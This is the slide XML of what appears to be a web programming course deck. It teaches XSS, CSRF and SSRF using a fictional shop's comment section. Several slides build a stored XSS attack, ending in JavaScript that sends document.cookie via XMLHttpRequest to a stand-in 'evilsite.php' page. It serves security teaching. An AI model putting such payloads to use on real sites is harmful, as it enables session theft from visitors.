                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORBA, SAP. Informix, DB2, SESAM/SQL, ODBC, BS200, ERP systems, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Because of it’s function this server is frequently situated as a front-end service which is connected to a wide variety of back-end systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Like many application servers it has a web page that is provided to simply test that the application is functioning.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From this page a user can craft a URL which allows HTTP requests to be sent out to other parts of the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This essentially allows a user to port scan the entire internal network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4236612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E47B-98E9-4AEF-B873-98AABAAE7944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Media References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{006DC369-681D-42B9-9806-3396CAD42FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read the following articles from OWASP.  Each one has a list of CWE’s (Common Weakness Enumerations) associated with it.  Choose two (except for SSRF which only has one) for each article and read them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Integrity Failure	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging and Monitoring	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-Side Request Forgery	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_(SSRF)/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410909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1" cy="3976612"/>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Caribou computers has upgraded its website!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now instead of just shopping, users can socialize!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main shop includes a comments sections where users can talk about whatever they are interested in!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The comment system, for now is anonymous!</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21083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1"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Of course, the first part of our reconnaissance is to see if we can put tags into the comment system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We test this by writing a comment with simple tags in it such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;b&gt;&lt;/b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you can see by the results on the left. Clearly, this site is just waiting to be taken advantage of.</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99936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Our next step is to try the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag and our usual technique of trying to insert an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case we had to try it twice.  The first time we used single quotes, and it didn’t work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying again with double quotes did the trick!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What next?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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96700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From here we want to get some data out of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To keep things simple lets, focus on exfiltrating the cookie again.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of course, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> just put another malicious link in the comment page and hope someone clicks it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But there’s something FAR more nefarious we can do.</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62584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Remember we can make the browser of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> who logs into this page run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript we want.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to send data somewhere.  Do you remember a JavaScript function that does this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Believe it or not, we can embed just a little bit of JavaScript and send it to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> comments page.</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79418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98486" y="1999695"/>
            <a:ext cx="4477570" cy="397661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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In case you forgot here’s how it works.  We need to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point it at a URL and say what kind of request it is.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send the request!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr</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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("GET","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php?comment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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s try it! </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47974537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{0304F9BE-F86B-4397-A5DD-B8898FF836C9}tf22712842_win32</Template>
  <TotalTime>3128</TotalTime>
  <Words>2746</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>159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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>Server-Side Web Programming (COMP10260)</vt:lpstr>
      <vt:lpstr>Examples – Part IV</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Is this still XSS?</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forging</vt:lpstr>
      <vt:lpstr>One more attack!</vt:lpstr>
      <vt:lpstr>Getting Started</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Caribou Computers (again!)</vt:lpstr>
      <vt:lpstr>Evilsite.com (again!)</vt:lpstr>
      <vt:lpstr>Fixing CSRF</vt:lpstr>
      <vt:lpstr>A08:2021 – Software and Data Integrity Failures </vt:lpstr>
      <vt:lpstr>A08:2021 – Software and Data Integrity Failures</vt:lpstr>
      <vt:lpstr>A09:2021 – Security Logging and Monitoring Failures </vt:lpstr>
      <vt:lpstr>A09:2021 – Security Logging and Monitoring Failures </vt:lpstr>
      <vt:lpstr>A09:2021 – Security Logging and Monitoring Failures</vt:lpstr>
      <vt:lpstr>A09:2021 – Security Logging and Monitoring Failures</vt:lpstr>
      <vt:lpstr>A09:2021 – Security Logging and Monitoring Failures</vt:lpstr>
      <vt:lpstr>A10:2021 – Server-Side Request Forgery (SSRF)</vt:lpstr>
      <vt:lpstr>A10:2021 – Server-Side Request Forgery (SSRF)</vt:lpstr>
      <vt:lpstr>A10:2021 – Server-Side Request Forgery (SSRF)</vt:lpstr>
      <vt:lpstr>Media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Web Programming (COMP10260)</dc:title>
  <dc:creator>Graham, Jonathan</dc:creator>
  <cp:lastModifiedBy>Graham, Jonathan</cp:lastModifiedBy>
  <cp:revision>131</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-07T18:27:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-04T22:41:46Z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